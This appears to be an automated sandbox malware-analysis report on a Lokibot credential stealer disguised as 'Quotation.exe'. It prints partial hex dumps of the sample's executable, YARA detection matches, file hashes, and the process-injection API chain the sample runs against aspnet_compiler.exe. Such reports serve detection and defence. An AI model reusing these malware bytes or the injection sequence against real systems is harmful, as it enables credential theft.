2024-12-02 13:46:25 UTC	489	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 78 f9 da 66 00 00 00 00 00 00 00 00 e0 00 2e 20 0b 01 30 00 00 34 00 00 00 38 00 00 00 00 00 00 2e 53 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 00 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELxf. 048.S `@ `
2024-12-02 13:46:25 UTC	1369	IN	Data Raw: 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 53 00 00 00 00 00 00 48 00 00 00 02 00 05 00 48 30 00 00 8c 22 00 00 01 00 00 00 00 00 00 00 2c 2f 00 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 05 00 63 00 00 00 01 00 00 11 00 16 28 10 00 00 06 0a 2b 23 00 02 03 04 05 28 0c 00 00 06 25 26 0b 07 2c 09 1a 28 10 00 00 06 0c 2b 3e 00 06 1e 28 10 00 00 06 58 0a 06 1f 0c 28 10 00 00 06 fe 02 1f 10 28 10 00 00 06 fe 01 0d 09 2d c6 19 45 01 00 00 00 f6 ff ff ff 17 2d 06 d0 0b 00 00 06 26 1f 14 28 10 00 00 06 0c 2b 00 08 2a 00 1b 30 0b 00 11 06 00 00 02 00 00 11 00 1f 18 28 10 00 00 06 0a 17 28 17 00 00 06 25 26 02 28 10 00 00 0a 25 26 0b 12 02 Data Ascii: @@SHH0",/0c(+#(%&,(+>(X((-E-&(+*0((%&(%&
2024-12-02 13:46:25 UTC	1369	IN	Data Raw: 01 13 23 11 23 3a eb fe ff ff 17 45 01 00 00 00 f6 ff ff ff 11 0c 28 1c 00 00 0a 25 26 13 0f 09 7b 01 00 00 04 11 07 20 d8 00 00 00 28 10 00 00 06 58 11 0f 20 dc 00 00 00 28 10 00 00 06 12 00 28 07 00 00 06 25 26 20 e0 00 00 00 28 10 00 00 06 fe 01 13 24 11 24 2c 10 1b 45 01 00 00 00 f6 ff ff ff 73 17 00 00 0a 7a 04 11 04 20 e4 00 00 00 28 10 00 00 06 58 28 18 00 00 0a 25 26 13 10 11 0b 13 25 11 25 2c 0e 1b 45 01 00 00 00 f6 ff ff ff 11 05 13 0c 11 06 20 e8 00 00 00 28 10 00 00 06 11 0c 11 10 58 9e 28 19 00 00 0a 20 ec 00 00 00 28 10 00 00 06 fe 01 13 26 11 26 2c 2b 00 09 7b 02 00 00 04 11 06 28 04 00 00 06 25 26 20 f0 00 00 00 28 10 00 00 06 fe 01 13 27 11 27 2c 06 73 17 00 00 0a 7a 00 2b 31 09 7b 02 00 00 04 11 06 28 05 00 00 06 25 26 20 f4 00 00 00 28 Data Ascii: ##:E(%&{ (X ((%& ($$,Esz (X(%&%%,E (X( (&&,+{(%& ('',sz+1{(%& (
2024-12-02 13:46:25 UTC	1369	IN	Data Raw: 0a 06 2a 00 00 1b 30 04 00 b4 00 00 00 07 00 00 11 02 6f 2e 00 00 0a 25 26 0a 06 72 9f 00 00 70 6f 31 00 00 0a 25 26 0b 07 16 2f 21 19 45 01 00 00 00 f6 ff ff ff 17 2d 06 d0 1b 00 00 06 26 06 72 bf 00 00 70 6f 31 00 00 0a 25 26 0b 07 16 2f 13 1a 45 01 00 00 00 f6 ff ff ff 7e 24 00 00 04 13 05 de 5e 07 1f 0f 58 0b 06 07 6f 32 00 00 0a 25 26 1f 6e 2e 0d 06 07 6f 32 00 00 0a 25 26 1f 4e 33 09 7e 24 00 00 04 13 05 de 36 06 07 1f 10 6f 30 00 00 0a 25 26 0c 08 20 03 02 00 00 28 33 00 00 0a 25 26 0d 09 28 34 00 00 0a 25 26 13 04 11 04 28 35 00 00 0a 11 04 13 05 de 05 26 de 00 14 2a 11 05 2a 01 10 00 00 00 00 00 00 ac ac 00 03 17 00 00 01 1b 30 03 00 23 00 00 00 08 00 00 11 7e 1c 00 00 04 25 0b 28 36 00 00 0a 1f 61 6a 02 28 1e 00 00 06 25 26 0a de 07 07 28 37 00 Data Ascii: 0o.%&rpo1%&/!E-&rpo1%&/E~$^Xo2%&n.o2%&N3~$6o0%& (3%&(4%&(5&*0#~%(6aj(%&(7
2024-12-02 13:46:25 UTC	1369	IN	Data Raw: ac 58 22 21 79 38 4e 36 01 00 00 00 43 3a 5c 55 73 65 72 73 5c 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 5c 44 6f 63 75 6d 65 6e 74 73 5c 43 72 79 70 74 6f 4f 62 66 75 73 63 61 74 6f 72 5f 4f 75 74 70 75 74 5c 44 45 4d 4f 4e 43 4f 44 45 52 2e 70 64 62 00 42 53 4a 42 01 00 01 00 00 00 00 00 0c 00 00 00 76 34 2e 30 2e 33 30 33 31 39 00 00 00 00 05 00 6c 00 00 00 9c 09 00 00 23 7e 00 00 08 0a 00 00 34 14 00 00 23 53 74 72 69 6e 67 73 00 00 00 00 3c 1e 00 00 10 00 00 00 23 47 55 49 44 00 00 00 4c 1e 00 00 60 03 00 00 23 42 6c 6f 62 00 00 00 ac 21 00 00 e0 00 00 00 23 55 53 00 00 00 00 00 02 00 00 01 57 95 02 14 09 03 00 00 00 fa 01 33 00 02 00 00 01 00 00 00 34 00 00 00 0d 00 00 00 24 00 00 00 23 00 00 00 3d 00 00 00 48 00 00 00 19 00 00 00 02 00 00 00 0a 00 00 Data Ascii: X"!y8N6C:\Users\Administrator\Documents\CryptoObfuscator_Output\DEMONCODER.pdbBSJBv4.0.30319l#~4#Strings<#GUIDL`#Blob!#USW34$#=H
2024-12-02 13:46:25 UTC	1369	IN	Data Raw: 00 91 00 2c 10 a6 00 36 00 70 2b 00 00 00 00 93 00 4e 10 ad 00 37 00 b0 2b 00 00 00 00 93 00 92 10 b4 00 38 00 e8 2b 00 00 00 00 93 00 b4 10 bc 00 3a 00 10 2f 00 00 00 00 91 00 1a 11 6e 00 3c 00 14 2f 00 00 00 00 93 00 3c 11 c3 00 3c 00 1c 2f 00 00 00 00 91 00 1a 11 6e 00 3d 00 20 2f 00 00 00 00 93 00 3c 11 cd 00 3d 00 28 2f 00 00 00 00 91 00 1a 11 6e 00 3e 00 00 00 01 00 e6 05 00 00 02 00 08 06 00 00 03 00 2a 06 00 00 04 00 4c 06 00 00 05 00 6e 06 00 00 06 00 90 06 00 00 07 00 b2 06 00 00 08 00 d4 06 00 00 09 00 f6 06 00 00 0a 00 18 07 00 00 01 00 5c 07 00 00 02 00 7e 07 00 00 01 00 5c 07 00 00 02 00 7e 07 00 00 01 00 5c 07 00 00 02 00 7e 07 00 00 01 00 5c 07 00 00 02 00 7e 07 00 00 01 00 28 08 00 00 02 00 4a 08 00 00 03 00 6c 08 00 00 04 00 8e 08 00 00 Data Ascii: ,6p+N7+8+:/n</<</n= /<=(/n>*Ln\~\~\~\~(Jl
2024-12-02 13:46:25 UTC	1369	IN	Data Raw: 45 52 25 00 41 72 72 61 79 00 41 74 74 72 69 62 75 74 65 00 42 69 74 43 6f 6e 76 65 72 74 65 72 00 42 6f 6f 6c 65 61 6e 00 42 75 66 66 65 72 00 42 79 74 65 00 43 68 61 72 00 43 6f 6e 76 65 72 74 00 44 65 62 75 67 67 61 62 6c 65 41 74 74 72 69 62 75 74 65 00 53 79 73 74 65 6d 2e 44 69 61 67 6e 6f 73 74 69 63 73 00 44 65 62 75 67 67 69 6e 67 4d 6f 64 65 73 00 50 72 6f 63 65 73 73 00 44 6f 75 62 6c 65 00 45 78 63 65 70 74 69 6f 6e 00 4e 75 6d 62 65 72 53 74 79 6c 65 73 00 53 79 73 74 65 6d 2e 47 6c 6f 62 61 6c 69 7a 61 74 69 6f 6e 00 49 6e 74 31 36 00 49 6e 74 33 32 00 49 6e 74 36 34 00 49 6e 74 50 74 72 00 43 6f 6d 70 72 65 73 73 69 6f 6e 4d 6f 64 65 00 53 79 73 74 65 6d 2e 49 4f 2e 43 6f 6d 70 72 65 73 73 69 6f 6e 00 44 65 66 6c 61 74 65 53 74 72 65 61 6d Data Ascii: ER%ArrayAttributeBitConverterBooleanBufferByteCharConvertDebuggableAttributeSystem.DiagnosticsDebuggingModesProcessDoubleExceptionNumberStylesSystem.GlobalizationInt16Int32Int64IntPtrCompressionModeSystem.IO.CompressionDeflateStream
2024-12-02 13:46:25 UTC	1369	IN	Data Raw: 63 33 63 30 62 36 32 63 33 66 36 37 38 64 65 31 63 39 38 38 00 63 33 30 33 62 66 38 39 30 34 35 34 32 33 36 33 34 32 64 64 63 34 36 36 64 61 35 33 34 38 34 32 36 00 63 39 61 34 63 37 66 32 33 39 63 36 36 62 38 37 32 32 35 34 34 61 66 33 36 31 62 62 65 36 36 64 34 00 63 64 34 34 38 34 64 38 36 62 37 33 35 64 35 62 37 35 65 63 31 65 33 62 61 62 31 62 62 33 66 62 61 00 63 35 30 31 30 31 32 32 33 32 66 30 38 30 66 31 36 39 33 62 39 64 34 35 39 30 36 61 65 31 37 34 38 00 63 36 35 62 33 61 63 63 33 37 61 63 65 63 64 61 61 31 39 31 36 33 65 66 33 61 32 30 30 30 37 35 61 00 63 30 31 62 34 34 66 62 64 64 62 39 39 39 65 66 32 31 37 31 61 30 62 32 66 38 66 62 31 33 33 33 32 00 63 65 39 31 37 38 62 65 30 61 65 37 65 35 64 61 37 37 36 34 65 66 62 36 32 37 64 61 37 63 Data Ascii: c3c0b62c3f678de1c988c303bf890454236342ddc466da5348426c9a4c7f239c66b8722544af361bbe66d4cd4484d86b735d5b75ec1e3bab1bb3fbac501012232f080f1693b9d45906ae1748c65b3acc37acecdaa19163ef3a200075ac01b44fbddb999ef2171a0b2f8fb13332ce9178be0ae7e5da7764efb627da7c
2024-12-02 13:46:25 UTC	1369	IN	Data Raw: 36 30 61 63 35 36 64 64 66 37 33 35 38 65 63 64 00 63 33 37 31 33 34 33 35 33 61 38 30 34 33 37 63 66 33 30 36 30 64 35 37 66 33 62 35 32 65 37 66 36 00 63 66 66 66 30 62 35 62 62 30 37 63 35 39 39 38 36 38 39 63 37 36 31 38 63 63 64 31 33 66 39 33 36 00 63 32 31 30 65 63 30 30 32 61 36 30 31 66 61 62 64 32 34 63 63 64 30 35 39 37 35 38 33 61 65 31 35 00 63 36 39 38 37 33 32 61 65 38 37 39 62 65 37 30 66 39 62 30 34 65 62 66 31 33 64 33 30 32 39 66 38 00 63 36 31 62 61 33 62 35 32 62 36 66 61 65 39 37 38 30 38 31 65 62 62 38 31 66 35 61 30 66 66 34 65 00 63 64 61 34 63 62 66 66 35 33 33 32 31 35 61 32 38 65 32 37 63 32 64 65 62 37 32 64 31 38 33 35 36 00 63 35 35 66 65 64 35 36 36 34 65 30 31 64 64 39 62 35 63 33 36 65 39 39 65 33 66 66 66 66 65 37 31 00 Data Ascii: 60ac56ddf7358ecdc37134353a80437cf3060d57f3b52e7f6cfff0b5bb07c5998689c7618ccd13f936c210ec002a601fabd24ccd0597583ae15c698732ae879be70f9b04ebf13d3029f8c61ba3b52b6fae978081ebb81f5a0ff4ecda4cbff533215a28e27c2deb72d18356c55fed5664e01dd9b5c36e99e3ffffe71
2024-12-02 13:46:25 UTC	1369	IN	Data Raw: 62 66 61 38 32 37 66 33 38 37 34 33 66 39 00 63 32 65 62 63 32 35 66 65 33 30 38 63 66 63 34 37 63 31 32 64 62 38 65 65 33 62 30 34 61 61 39 36 00 63 35 39 31 38 37 30 31 38 35 63 63 34 32 35 62 35 61 34 63 61 38 63 39 31 38 63 38 35 35 66 37 31 00 63 63 36 66 36 35 39 33 64 66 30 61 34 32 31 66 65 65 34 38 62 63 64 61 37 65 35 61 37 34 32 35 61 00 63 30 61 64 37 38 36 31 31 36 38 64 32 33 31 62 64 31 34 31 39 38 36 65 62 35 33 36 64 31 36 63 30 00 63 34 31 64 64 30 62 38 37 36 62 63 32 31 33 61 33 62 34 33 32 32 63 39 33 35 65 65 30 32 37 37 61 00 63 32 32 30 65 63 66 64 39 66 63 37 39 64 66 36 65 37 32 62 31 35 66 33 33 33 62 35 37 30 66 36 64 00 63 65 66 35 61 36 30 64 61 63 63 37 35 66 66 61 62 35 61 31 62 34 34 62 30 65 35 62 39 39 31 39 32 00 63 37 Data Ascii: bfa827f38743f9c2ebc25fe308cfc47c12db8ee3b04aa96c591870185cc425b5a4ca8c918c855f71cc6f6593df0a421fee48bcda7e5a7425ac0ad7861168d231bd141986eb536d16c0c41dd0b876bc213a3b4322c935ee0277ac220ecfd9fc79df6e72b15f333b570f6dcef5a60dacc75ffab5a1b44b0e5b99192c7

Target ID:	2
Start time:	08:46:18
Start date:	02/12/2024
Path:	C:\Users\user\Desktop\Quotation.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Quotation.exe"
Imagebase:	0x360000
File size:	156'160 bytes
MD5 hash:	A6D27C830AF952414FF70B257CF26948
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000002.00000002.1343184318.000000000270A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000000.1280573223.0000000000362000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.1343631435.0000000003699000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.1343631435.0000000003699000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1343631435.0000000003699000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000002.00000002.1343631435.0000000003699000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000002.00000002.1343631435.0000000003699000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.1343631435.0000000003699000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.1343184318.00000000027AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.1343184318.00000000027AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1343184318.00000000027AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000002.00000002.1343184318.00000000027AE000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000002.00000002.1343184318.00000000027AE000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.1343184318.00000000027AE000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.1343631435.0000000003679000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.1343631435.0000000003679000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1343631435.0000000003679000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000002.00000002.1343631435.0000000003679000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.1343631435.0000000003679000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:46:25
Start date:	02/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Imagebase:	0xc80000
File size:	56'368 bytes
MD5 hash:	FDA8C8F2A4E100AFB14C13DFCBCAB2D2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000005.00000002.2554104862.00000000013C7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	11.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	17
Total number of Limit Nodes:	2

Executed Functions

Function 0260F958 Relevance: 1.7, APIs: 1, Instructions: 236
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0260FB37

Memory Dump Source

Source File: 00000002.00000002.1343105888.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2600000_Quotation.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: ec21b172b2467ebdbf8d43fa526164ac8c163a7cba8053eed1be7fe03729e433
Instruction ID: 5ad0b527276086af6c326ce3d4413314ddc7b015cbea6614e51da7f4abc948e9
Opcode Fuzzy Hash: ec21b172b2467ebdbf8d43fa526164ac8c163a7cba8053eed1be7fe03729e433
Instruction Fuzzy Hash: 1C81C075C4022DDFDB25CFA5D884BDEBBF1AB09304F0490AAE548B7260DB709A85DF94

Function 05A20142 Relevance: 1.6, APIs: 1, Instructions: 111
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 05A20216

Memory Dump Source

Source File: 00000002.00000002.1344182731.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5a20000_Quotation.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 40ee96c34f297e3aace2143cad9cdc3d87ff777ab28017804436155bbf8855a8
Instruction ID: 6b48f43937122b36cb024d40f87be871dbd5149f68b13b7b85fef1cad4c17a9e
Opcode Fuzzy Hash: 40ee96c34f297e3aace2143cad9cdc3d87ff777ab28017804436155bbf8855a8
Instruction Fuzzy Hash: F54189B5D042589FCF10CFA9D984ADEFBF1BB49310F24902AE918B7210D375AA45CF64

Function 05A20148 Relevance: 1.6, APIs: 1, Instructions: 110
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 05A20216

Memory Dump Source

Source File: 00000002.00000002.1344182731.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5a20000_Quotation.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: dab9394b8332c9a6892e4f9a355dcfaeb038072e5a3ba97295f90ff44ad4c87b
Instruction ID: 3e1dfe2d9b7c49cf947bb46c59fc5fd783e19214eac875715d00ad3b3c5e76c0
Opcode Fuzzy Hash: dab9394b8332c9a6892e4f9a355dcfaeb038072e5a3ba97295f90ff44ad4c87b
Instruction Fuzzy Hash: 954168B5D042589FCB10CFAAD984ADEFBF1BB49310F24902AE918B7210D375AA45CF64

Function 0260FDE8 Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0260FE95

Memory Dump Source

Source File: 00000002.00000002.1343105888.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2600000_Quotation.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 947203b07465824c827c854aaab7de94071c244a8de98be0ad9385e2babe9180
Instruction ID: 63345695a243b89e13b65a64580afa6c0aa3580637e47ddbf6be554054d73f91
Opcode Fuzzy Hash: 947203b07465824c827c854aaab7de94071c244a8de98be0ad9385e2babe9180
Instruction Fuzzy Hash: 433168B9D04258DFCF10CFAAD984ADEFBB5BB09310F10902AE818B7250D735A945CF65

Function 05A2003A Relevance: 1.6, APIs: 1, Instructions: 98
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 05A200E5

Memory Dump Source

Source File: 00000002.00000002.1344182731.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5a20000_Quotation.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 7ab67bb76721ea1cf13f0009308d603afab0d770ebebc2428f49076becb50129
Instruction ID: f0884858a25bd6d410dfb905c2bc297c5139a472e26c4c47a97a4211e1023a87
Opcode Fuzzy Hash: 7ab67bb76721ea1cf13f0009308d603afab0d770ebebc2428f49076becb50129
Instruction Fuzzy Hash: 833167B9D042599FCF10CFA9E984ADEFBB1BB19310F10A02AE814B7310D775A946CF65

Function 05A20040 Relevance: 1.6, APIs: 1, Instructions: 95
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 05A200E5

Memory Dump Source

Source File: 00000002.00000002.1344182731.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5a20000_Quotation.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 83c01f6570fbfd9455218a5435041217c1dc4fae86b8ce714135513cdfa4380e
Instruction ID: 5f229616f1e225207be6325e702dfa43d3269c67f87341939113d261de0f127d
Opcode Fuzzy Hash: 83c01f6570fbfd9455218a5435041217c1dc4fae86b8ce714135513cdfa4380e
Instruction Fuzzy Hash: 363177B9D04258DFCF10CFA9E984A9EFBB5BB09310F10A02AE818B7310D735A945CF65

Function 0260FCD8 Relevance: 1.6, APIs: 1, Instructions: 88
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0260FD82

Memory Dump Source

Source File: 00000002.00000002.1343105888.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2600000_Quotation.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 8d1e2f8560e6ef5c31610b83a2dd37d54e79fced7a3e64f2e13d2056cc2d7a8c
Instruction ID: 41a4a1ba57bad54bf36c14a7ee28bb3f2f632f9e0c80f8fdb794b61ba7a66105
Opcode Fuzzy Hash: 8d1e2f8560e6ef5c31610b83a2dd37d54e79fced7a3e64f2e13d2056cc2d7a8c
Instruction Fuzzy Hash: 1B31ACB5D012589FCB14CFAAD984ADEFBF1BB49314F14802AE414B7390C778A945CF64

Function 05A20280 Relevance: 1.6, APIs: 1, Instructions: 70
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32(?), ref: 05A202FE

Memory Dump Source

Source File: 00000002.00000002.1344182731.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5a20000_Quotation.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 32210a24941146172999cf84ab1f02477a6e38dd597ce3dcdb5b43c1367526d1
Instruction ID: 63251f7c2427c4509e2d40fd5ec89bb5c5f340f2e044ed7677a54d49cdce1eff
Opcode Fuzzy Hash: 32210a24941146172999cf84ab1f02477a6e38dd597ce3dcdb5b43c1367526d1
Instruction Fuzzy Hash: 8B21CAB8D042599FCB10CFA9D885ADEFBF0BB48310F14902AE814B7311C335A941CFA4

Function 05A20288 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32(?), ref: 05A202FE

Memory Dump Source

Source File: 00000002.00000002.1344182731.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5a20000_Quotation.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: eae4b5719ab222f104519811096fd18a1dd2eb28a7e16ada1ef8a8e348910fab
Instruction ID: eced31fdd1aff20ea6ad32f8213b955e2c646db4a28cc43df7c1040ba93c4a55
Opcode Fuzzy Hash: eae4b5719ab222f104519811096fd18a1dd2eb28a7e16ada1ef8a8e348910fab
Instruction Fuzzy Hash: 112188B8D002189FCB10CFA9D585ADEFBF4BB09320F14901AE818B7310D335A945CFA4

Non-executed Functions

Function 026017F0 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1343105888.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2600000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 646103109d350e135eea98648112ac65588f9144bc06c640f5f0ce77a566f922
Instruction ID: 27f9b3cfe5266fe59f2a9622d147238d015b435ac7dcf3d7e4dc0415567bd322
Opcode Fuzzy Hash: 646103109d350e135eea98648112ac65588f9144bc06c640f5f0ce77a566f922
Instruction Fuzzy Hash: 83415E71E016198BEB2CCF6B9D4079AFAF7AFC9300F14C1FA851DA6654EB3009869F11

Function 026017DF Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1343105888.0000000002600000.00000040.00000800.00020000.00000000.sdmp, Offset: 02600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2600000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8bc3aab31923fb1e55e117d5d0af82d7945f764d227848a6ee26d61b3552949
Instruction ID: 90cf4729fd63acaf61e9672a6996ff8c3cf0f39336867be9035e15a4e7fd7770
Opcode Fuzzy Hash: a8bc3aab31923fb1e55e117d5d0af82d7945f764d227848a6ee26d61b3552949
Instruction Fuzzy Hash: 8A413271E016598BEB5CCF6B9D5079AFAF3AFC9300F14C1FA881DA6664DB7009868F11

Analysis Process: aspnet_compiler.exePID: 1648, Parent PID: 4828COMMON

Execution Graph

Execution Coverage:	30.8%
